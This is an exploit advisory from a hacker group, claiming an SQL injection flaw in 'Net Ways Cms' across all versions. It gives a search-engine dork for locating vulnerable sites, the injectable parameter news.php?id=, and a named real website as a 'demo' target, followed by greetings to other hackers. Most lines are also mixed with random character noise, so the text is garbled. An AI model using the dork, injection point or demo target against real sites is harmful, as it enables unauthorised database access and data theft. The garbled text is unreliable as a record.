################################################################################??######## # j z' l! ?* \) K) ?# A# @
# . u6 |' @7 T& a, e4 L' |$ _; F2 E& `
# Exploit Title : Net Ways Cms Sql Injection Vulnerability
8 V* m7 Q V* m/ K9 ]#
9 C( S0 x: y A9 z( Y# s( _# Author : IrIsT.Ir
- [# h7 A4 D% w& |# * e2 n! y2 t# B( m, b
# Discovered By : Am!r
: {0 I0 L5 ^5 t2 R5 q8 t#
) ?9 D( i3 y2 g7 P K z* U; z# Home : http://IrIsT.Ir/forum / X; m8 Z, ?4 n5 d, a1 B
# * @: L! W! l# F- I) G. Z) I9 |
# Software Link : http://www.netways.com/ www.political-security.com
! X; H2 W* K) X) t! s: A! r#
3 ?7 x" E7 B7 _% U: x: Q. C+ V# Security Risk : High
# [8 s; G9 [+ }3 ~; h2 M3 \#
! h, Z: |. l# S0 a0 W- e# Version : All Version
% k% ?# u0 e+ @1 _# & [: i i: i& Y3 E1 D: Q
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
) Q& p+ j% C. Y( Q+ m# 9 W2 U" E' ]$ q' n) K, \# P( i6 m
# Dork : intext:"Designed & developed by NetWays"
" W+ Y4 ]! k4 Q. E' A \# , _7 h$ H$ ^$ U) U$ O5 L
################################################################################??######## 5 _0 T3 m7 e; ]& I
# ) S5 N, s' G- X' N
# Expl0iTs :
/ p3 F; \- N: Y- r7 f9 C1 P#
) j& w* I# F% q9 N: @% x; k# http://target.com/news.php?id=[Sql] 0 _/ _9 |! b- S! a
#
' D* o/ z% Q/ W& C" h#
; g! L. f6 ]' f- O# D3mo :
4 Z% _: a9 h, m$ U# ?/ _#
& `- ~ E/ B; I# http://compagnieparento.com/news.php?id=7[Sql] % j e Q$ M/ u+ L( Z9 P# @! N
#
9 @+ I. c( B# J) O5 ]" i################################################################################??######## 4 A% Q, Q! d1 v9 b* m
#
- x) X9 R7 E# N! a. l) a4 ?: @# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r ( t* U2 H. Q. u* R6 d
#
" i5 U& H* b1 Z, ?" t' c# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r % G F4 r U, u) j0 C0 m
#
& l5 }2 m# L& Y- o( q# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
6 o: j! P$ G3 L3 _+ I#
* U. G/ R. F- p: j3 T) s################################################################################??######## |